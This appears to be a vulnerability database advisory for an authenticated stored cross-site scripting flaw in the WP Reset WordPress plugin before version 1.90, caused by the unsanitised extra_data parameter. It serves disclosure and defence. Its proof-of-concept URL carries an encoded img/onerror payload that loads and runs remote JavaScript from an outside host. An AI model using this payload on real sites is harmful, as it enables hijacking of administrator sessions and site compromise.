Lucene search

K
wpexploitM0zeWPEX-ID:90CF8F9D-4D37-405D-B161-239BDB281828
HistoryJun 16, 2021 - 12:00 a.m.

WP Reset < 1.90 - Authenticated Stored XSS

2021-06-1600:00:00
m0ze
309

0.001 Low

EPSS

Percentile

24.8%

The plugin did not sanitise or escape its extra_data parameter when creating a snapshot via the admin dashboard, leading to an authenticated Stored Cross-Site Scripting issue

PoC | Authenticated Persistent XSS | Enter snapshot name or brief description:

https://example.com/wp-admin/admin-ajax.php?action=wp_reset_run_tool&_ajax_nonce=394f497fd0&tool=create_snapshot&extra_data=%3Cimg%20src%3Dx%20onerror%3D%3Bimport(%60%2F%2Fm0ze.ru%2Fpayload%2Fa.js%60)%3B%20%2F%2F%3E

0.001 Low

EPSS

Percentile

24.8%

Related for WPEX-ID:90CF8F9D-4D37-405D-B161-239BDB281828